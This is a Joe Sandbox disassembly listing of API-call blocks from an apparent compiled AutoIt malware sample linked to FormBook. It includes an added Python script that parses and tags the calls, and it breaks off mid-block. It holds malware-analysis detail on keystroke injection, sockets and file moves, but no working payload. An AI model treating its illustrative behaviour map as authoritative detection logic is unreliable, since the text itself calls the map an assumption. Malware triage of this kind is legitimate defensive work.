                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4137639002-1221869570
                          • Opcode ID: bd76a1082a9b920ee5849be41c338a05b9bc92e4afcdfa2fac0b3e78ac0a664d
                          • Instruction ID: 6f28d8abff01fc8429dab997a4863ebaba8e896bfd4d255ff74fd18c3b557041
                          • Opcode Fuzzy Hash: bd76a1082a9b920ee5849be41c338a05b9bc92e4afcdfa2fac0b3e78ac0a664d
                          • Instruction Fuzzy Hash: 2E918C75A083059FC704EF24C8819AAB7E5FF89714F14882DF88997361DB34EE45EB92
                          APIs
                            • Part of subcall function 00F6000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?,?,00F6035E), ref: 00F6002B
                            • Part of subcall function 00F6000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60046
                            • Part of subcall function 00F6000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60054
                            • Part of subcall function 00F6000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?), ref: 00F60064
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F84C51
                          • _wcslen.LIBCMT ref: 00F84D59
                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F84DCF
                          • CoTaskMemFree.OLE32(?), ref: 00F84DDA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 614568839-2785691316
                          • Opcode ID: afd2a978684f3c7a7f0ea982af24271323f27adea93fb3cf8c87786b188d45c1
                          • Instruction ID: 1c6be84d1c077e5e1558d6e1abe310db30a2bca7baad070202570e3503852fb2
                          • Opcode Fuzzy Hash: afd2a978684f3c7a7f0ea982af24271323f27adea93fb3cf8c87786b188d45c1
                          • Instruction Fuzzy Hash: 00911C71D0021EAFDF14EFA4DC91AEEB7B8BF04314F108169E515A7291EB746A44EFA0
                          APIs
                          • GetMenu.USER32(?), ref: 00F92183
                          • GetMenuItemCount.USER32(00000000), ref: 00F921B5
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F921DD
                          • _wcslen.LIBCMT ref: 00F92213
                          • GetMenuItemID.USER32(?,?), ref: 00F9224D
                          • GetSubMenu.USER32(?,?), ref: 00F9225B
                            • Part of subcall function 00F63A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63A57
                            • Part of subcall function 00F63A3D: GetCurrentThreadId.KERNEL32 ref: 00F63A5E
                            • Part of subcall function 00F63A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F625B3), ref: 00F63A65
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F922E3
                            • Part of subcall function 00F6E97B: Sleep.KERNEL32 ref: 00F6E9F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                          • String ID:
                          • API String ID: 4196846111-0
                          • Opcode ID: 799d59c4a125b9dc48e950f7e3c3875966a1bf3afbb7993f4955b48397d1bbf5
                          • Instruction ID: e67e212d70ad453394e9aea190dbe2fd24e78983273717d9a1a5ca5cdc531271
                          • Opcode Fuzzy Hash: 799d59c4a125b9dc48e950f7e3c3875966a1bf3afbb7993f4955b48397d1bbf5
                          • Instruction Fuzzy Hash: 09719176E00205AFEF50EF64C841AAEB7F5EF48320F148459E916EB351DB38ED41AB90
                          APIs
                          • IsWindow.USER32(01245578), ref: 00F97F37
                          • IsWindowEnabled.USER32(01245578), ref: 00F97F43
                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F9801E
                          • SendMessageW.USER32(01245578,000000B0,?,?), ref: 00F98051
                          • IsDlgButtonChecked.USER32(?,?), ref: 00F98089
                          • GetWindowLongW.USER32(01245578,000000EC), ref: 00F980AB
                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F980C3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                          • String ID:
                          • API String ID: 4072528602-0
                          • Opcode ID: d2267d8fc7ccb2fc68774b58ae334d3298035a822b0f262372a9999cc84e0db4
                          • Instruction ID: e373d851bb7eeb62ce42c1c4143499a5db50675edf49eab9781c77e8d3c87c89
                          • Opcode Fuzzy Hash: d2267d8fc7ccb2fc68774b58ae334d3298035a822b0f262372a9999cc84e0db4
                          • Instruction Fuzzy Hash: DA71A235908344AFFF21AF64CC94FAA7BB5FF0A364F14005AE95567261CB31A845EB90
                          APIs
                          • GetParent.USER32(?), ref: 00F6AEF9
                          • GetKeyboardState.USER32(?), ref: 00F6AF0E
                          • SetKeyboardState.USER32(?), ref: 00F6AF6F
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F6AF9D
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6AFBC
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F6AFFD
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F6B020
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 8ba2b3b7c3358f49d122170e3f27383e3506252ac903085286bf8763b878edea
                          • Instruction ID: b212d4dd9fff05f021fd24cd0e8190a7dbf81467b9c73824bc8f78fc36bb36b8
                          • Opcode Fuzzy Hash: 8ba2b3b7c3358f49d122170e3f27383e3506252ac903085286bf8763b878edea
                          • Instruction Fuzzy Hash: 4651B2A1E047D53DFB3682348C45BBABEE95B06314F088589E1D9954C3D3E9A8C4EB52
                          APIs
                          • GetParent.USER32(00000000), ref: 00F6AD19
                          • GetKeyboardState.USER32(?), ref: 00F6AD2E
                          • SetKeyboardState.USER32(?), ref: 00F6AD8F
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F6ADBB
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F6ADD8
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F6AE17
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F6AE38
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: b86678ca7e783934dee40728e103f239ffa8e507f150cbd1691f75cca074c31f
                          • Instruction ID: 4e4a03e390a058a5b3fca8203d93d1a891c69080052287e01d60df9644408968
                          • Opcode Fuzzy Hash: b86678ca7e783934dee40728e103f239ffa8e507f150cbd1691f75cca074c31f
                          • Instruction Fuzzy Hash: 2D5107A1E047D53DFB3383358C95B7A7EE85B06310F088489E1D5668C3D295EC94FB52
                          APIs
                          • GetConsoleCP.KERNEL32(00F43CD6,?,?,?,?,?,?,?,?,00F35BA3,?,?,00F43CD6,?,?), ref: 00F35470
                          • __fassign.LIBCMT ref: 00F354EB
                          • __fassign.LIBCMT ref: 00F35506
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F43CD6,00000005,00000000,00000000), ref: 00F3552C
                          • WriteFile.KERNEL32(?,00F43CD6,00000000,00F35BA3,00000000,?,?,?,?,?,?,?,?,?,00F35BA3,?), ref: 00F3554B
                          • WriteFile.KERNEL32(?,?,00000001,00F35BA3,00000000,?,?,?,?,?,?,?,?,?,00F35BA3,?), ref: 00F35584
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 285c908a9b2e9f4fabec6eff8bba4bda6df98b913ca0feae8a77cdcc6152339a
                          • Instruction ID: 2b9caba23166c491808bf5a5ad7ab7f991d06985bf75644ce0eb2511aee76596
                          • Opcode Fuzzy Hash: 285c908a9b2e9f4fabec6eff8bba4bda6df98b913ca0feae8a77cdcc6152339a
                          • Instruction Fuzzy Hash: D251D3B1D006089FDB10CFA8D841AEEBBF9EF48720F14451AF555E7291D730AA41DB60
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 00F22D4B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00F22D53
                          • _ValidateLocalCookies.LIBCMT ref: 00F22DE1
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00F22E0C
                          • _ValidateLocalCookies.LIBCMT ref: 00F22E61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 3b3d6a7d160e677ae5b3ddad9fd134122c7283141bedc615b742c11b2dc48601
                          • Instruction ID: 4f8d393a2cbdd6356c790c2bcb078745fe0feb5f164cf0d81bf8e00aef3a3753
                          • Opcode Fuzzy Hash: 3b3d6a7d160e677ae5b3ddad9fd134122c7283141bedc615b742c11b2dc48601
                          • Instruction Fuzzy Hash: 45411475E00228BBCF10DF68EC45AAEBBB0BF45324F548155E814AB392D739DA01EBD0
                          APIs
                            • Part of subcall function 00F8304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F8307A
                            • Part of subcall function 00F8304E: _wcslen.LIBCMT ref: 00F8309B
                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F81112
                          • WSAGetLastError.WSOCK32 ref: 00F81121
                          • WSAGetLastError.WSOCK32 ref: 00F811C9
                          • closesocket.WSOCK32(00000000), ref: 00F811F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 2675159561-0
                          • Opcode ID: 64d9b6151f048127e83b33761fc50f1eff3696e4d800f9433aa72703b35b5b9f
                          • Instruction ID: ce16519185136e9457c43f7202cc2fbf86003362f68f19a97f600460202e86ad
                          • Opcode Fuzzy Hash: 64d9b6151f048127e83b33761fc50f1eff3696e4d800f9433aa72703b35b5b9f
                          • Instruction Fuzzy Hash: 6D41D431600608AFDB10AF54CC88BEAB7EDFF45364F148259F9159B291C774AD42EBE1
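The strings that appear in the blocks above ("AUTOIT.ERROR", "Incorrect Object type in FOR..IN loop", "Null Object assignment in FOR..IN loop", "NULL Pointer assignment") are error messages of the AutoIt interpreter, which matches the "Binary is likely a compiled AutoIt script file" signature for this sample: these function blocks belong to the AutoIt runtime the script was compiled with, not to the injected FormBook payload, and an analyst triaging the listing wants to separate runtime stubs from the behaviour the script actually drives. The Python script below is an added example and is not part of the Joe Sandbox report. It parses the "APIs" entries of a function block in the format shown on this page (the keyboard block at 00F6AEF9 and the socket block at 00F81112 are embedded verbatim as sample input), resolves the window-message, virtual-key and socket constants from the Windows SDK, and tags a block with a behaviour when every API in a required set appears. The behaviour map and the regular expression are illustrative assumptions fitted to this listing, not Joe Sandbox signatures or the sandbox's own "API ID" grouping.

```python
"""Added example: parse and annotate the 'APIs' lists of Joe Sandbox function
blocks. Not part of the report; the behaviour map below is an assumption."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Fitted to the listing format on this page (assumption):
#   • Name.MODULE(arg,arg,...), ref: ADDR
#   • Name.MODULE ref: ADDR
#   • Part of subcall function ADDR: Name.MODULE(...), ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]+))?\s*$"
)

# Constants from winuser.h / winsock.h.
WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x111: "WM_COMMAND"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# Illustrative behaviour map (assumption): a tag fires when every listed API
# occurs in one function's call list, counting direct calls and subcalls.
BEHAVIOURS = {
    "synthetic keystroke injection": {"GetKeyboardState", "SetKeyboardState", "PostMessageW"},
    "input-queue attach to foreign thread": {"AttachThreadInput"},
    "TCP client socket": {"socket", "closesocket"},
    "COM object instantiation": {"CoInitializeSecurity", "CoCreateInstanceEx"},
    "file move via shell": {"MoveFileW", "SHFileOperationW"},
}


def _hex(token: str) -> Optional[int]:
    """Parse a sandbox argument; '?' marks a value the sandbox could not resolve."""
    try:
        return int(token, 16)
    except ValueError:
        return None


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]

    def decoded(self) -> str:
        """Render the call with known message, VK and socket constants named."""
        args = list(self.args)
        if self.name in ("PostMessageW", "SendMessageW") and len(args) >= 3:
            msg = _hex(args[1])
            if msg in WM_NAMES:
                args[1] = WM_NAMES[msg]
                vk = _hex(args[2])
                if msg in (0x100, 0x101) and vk in VK_NAMES:
                    args[2] = VK_NAMES[vk]
        if self.name == "socket" and len(args) >= 3:
            fam, typ, proto = (_hex(a) for a in args[:3])
            if (fam, typ, proto) == (2, 1, 6):  # AF_INET, SOCK_STREAM, IPPROTO_TCP
                args[:3] = ["AF_INET", "SOCK_STREAM", "IPPROTO_TCP"]
        return f"{self.name}.{self.module}({','.join(args)})"


def parse_api_block(text: str) -> List[ApiCall]:
    """Turn the lines of one 'APIs' section into ApiCall records (in order)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             m.group("ref") or "", m.group("sub")))
    return calls


def behaviours(calls: List[ApiCall]) -> List[str]:
    """Tags whose full API set is present in this function's call list."""
    seen = {c.name for c in calls}
    return [tag for tag, needed in BEHAVIOURS.items() if needed <= seen]


# Sample input copied from the listing above (two function blocks).
KEYBOARD_BLOCK = """\
• GetParent.USER32(?), ref: 00F6AEF9
• GetKeyboardState.USER32(?), ref: 00F6AF0E
• SetKeyboardState.USER32(?), ref: 00F6AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00F6AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00F6AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F6B020
"""

SOCKET_BLOCK = """\
  • Part of subcall function 00F8304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F8307A
  • Part of subcall function 00F8304E: _wcslen.LIBCMT ref: 00F8309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F81112
• WSAGetLastError.WSOCK32 ref: 00F81121
• WSAGetLastError.WSOCK32 ref: 00F811C9
• closesocket.WSOCK32(00000000), ref: 00F811F9
"""

if __name__ == "__main__":
    for block in (KEYBOARD_BLOCK, SOCKET_BLOCK):
        calls = parse_api_block(block)
        for c in calls:
            prefix = f"  [sub {c.subcall_of}] " if c.subcall_of else "  "
            print(f"{prefix}{c.decoded()} @ {c.ref}")
        print("  behaviours:", behaviours(calls))
```

Run stand-alone, the keyboard block decodes to four WM_KEYUP posts for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN bracketed by GetKeyboardState/SetKeyboardState, which is the modifier-release pattern of a Send-style keystroke routine, and the socket block decodes to socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) followed by closesocket. Both tags describe the AutoIt runtime's capabilities; whether the compiled script exercises them is a separate question answered by the behaviour sections of the report, not by the presence of the stubs.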
                          APIs
                            • Part of subcall function 00F6DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F6CF22,?), ref: 00F6DDFD
                            • Part of subcall function 00F6DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F6CF22,?), ref: 00F6DE16
                          • lstrcmpiW.KERNEL32(?,?), ref: 00F6CF45
                          • MoveFileW.KERNEL32(?,?), ref: 00F6CF7F
                          • _wcslen.LIBCMT ref: 00F6D005
                          • _wcslen.LIBCMT ref: 00F6D01B
                          • SHFileOperationW.SHELL32(?), ref: 00F6D061
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                          • String ID: \*.*
                          • API String ID: 3164238972-1173974218
                          • Opcode ID: 1a53bf85134a9a127106982c91e47f464e6f6c54f11f72596e2e72988d510f58
                          • Instruction ID: ea83efb18c1ceddcb1d5e664875e5bc585ba8095e00e73befe962423a715520c
                          • Opcode Fuzzy Hash: 1a53bf85134a9a127106982c91e47f464e6f6c54f11f72596e2e72988d510f58
                          • Instruction Fuzzy Hash: 8F414871D451199FDF12EFA4DD81AED77B9AF08380F1000E6E545E7142EA74A684EB50
                          APIs
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F92E1C
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F92E4F
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F92E84
                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F92EB6
                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F92EE0
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F92EF1
                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F92F0B
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: f8aae5a248f9a36b2e4bdad3d0395da60bacb467724a87ae3272868f5043aa90
                          • Instruction ID: a95ac0fe73b3826717d155509d0f4eadb8f44a6512187244ccf974ee39e53d83
                          • Opcode Fuzzy Hash: f8aae5a248f9a36b2e4bdad3d0395da60bacb467724a87ae3272868f5043aa90
                          • Instruction Fuzzy Hash: B0310235A05258AFEF61DF58DCD4F6537E1FB8A720F1501A6FA048B2B2CB71A840EB51
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F67769
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F6778F
                          • SysAllocString.OLEAUT32(00000000), ref: 00F67792
                          • SysAllocString.OLEAUT32(?), ref: 00F677B0
                          • SysFreeString.OLEAUT32(?), ref: 00F677B9
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00F677DE
                          • SysAllocString.OLEAUT32(?), ref: 00F677EC
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: 276104fb5c1f99c6af7d217fc0e649cd1f852659c9abdcc7ad34509e868d3865
                          • Instruction ID: 5598e441bf64b30fc0939c2e51c67d8b34a63fc1ab1edd6286016b2f746c5176
                          • Opcode Fuzzy Hash: 276104fb5c1f99c6af7d217fc0e649cd1f852659c9abdcc7ad34509e868d3865
                          • Instruction Fuzzy Hash: 9021C176A08219AFDF10EFACCD88DBB77ACEB093687048026FA04DB150D674DC41A7A4
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F67842
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F67868
                          • SysAllocString.OLEAUT32(00000000), ref: 00F6786B
                          • SysAllocString.OLEAUT32 ref: 00F6788C
                          • SysFreeString.OLEAUT32 ref: 00F67895
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00F678AF
                          • SysAllocString.OLEAUT32(?), ref: 00F678BD
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: a924ba2481d8f9e73be494c9bd4b61836851b2abb02f6cd19b95f8257427c48d
                          • Instruction ID: 6761145b2305fb811bfa495ddcc024a5d90c7d9b8cc8a89e3ff81989261a7747
                          • Opcode Fuzzy Hash: a924ba2481d8f9e73be494c9bd4b61836851b2abb02f6cd19b95f8257427c48d
                          • Instruction Fuzzy Hash: AC214735A04308AFDB10AFBCDC88DAA77ECEB097647248125F915CB1A5D674DC81DB64
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 00F704F2
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F7052E
                          Strings
                          Similarity
                          • API ID: CreateHandlePipe
                          • String ID: nul
                          • API String ID: 1424370930-2873401336
                          • Opcode ID: 8d8051c24323efc247726f6c3835197fe61e0520aea35bccd3a9a04be451b7b3
                          • Instruction ID: f1739c4053db2d81cef4dda456a1767a7c5c394a8d85f7049a5db9343c984ed1
                          • Opcode Fuzzy Hash: 8d8051c24323efc247726f6c3835197fe61e0520aea35bccd3a9a04be451b7b3
                          • Instruction Fuzzy Hash: 05217175900305EFDB209F29DC45A9A7BB4AF44734F248A1AF8A5D72E0DB70D940EF61
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 00F705C6
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F70601
                          Strings
                          Similarity
                          • API ID: CreateHandlePipe
                          • String ID: nul
                          • API String ID: 1424370930-2873401336
                          • Opcode ID: 6018872b6346ef1d1a576e037bea61ea961ae2d3ce0859e417ec1b01986a29bf
                          • Instruction ID: 40301c1a24f1ad497f28b8234954ebb4219151fb78f7ef0bdfcc3f388dab6b1a
                          • Opcode Fuzzy Hash: 6018872b6346ef1d1a576e037bea61ea961ae2d3ce0859e417ec1b01986a29bf
                          • Instruction Fuzzy Hash: 2021B575900305DBDB209F69CC54A5A77E4BF85730F208B1BF8A5E72D0DB709860EB61
                          APIs
                            • Part of subcall function 00F0600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F0604C
                            • Part of subcall function 00F0600E: GetStockObject.GDI32(00000011), ref: 00F06060
                            • Part of subcall function 00F0600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F0606A
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F94112
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F9411F
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F9412A
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F94139
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F94145
                          Strings
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: 8f03e729264811b8e3ca711bda371e22eaa1877972c72fae9175d01bfea72828
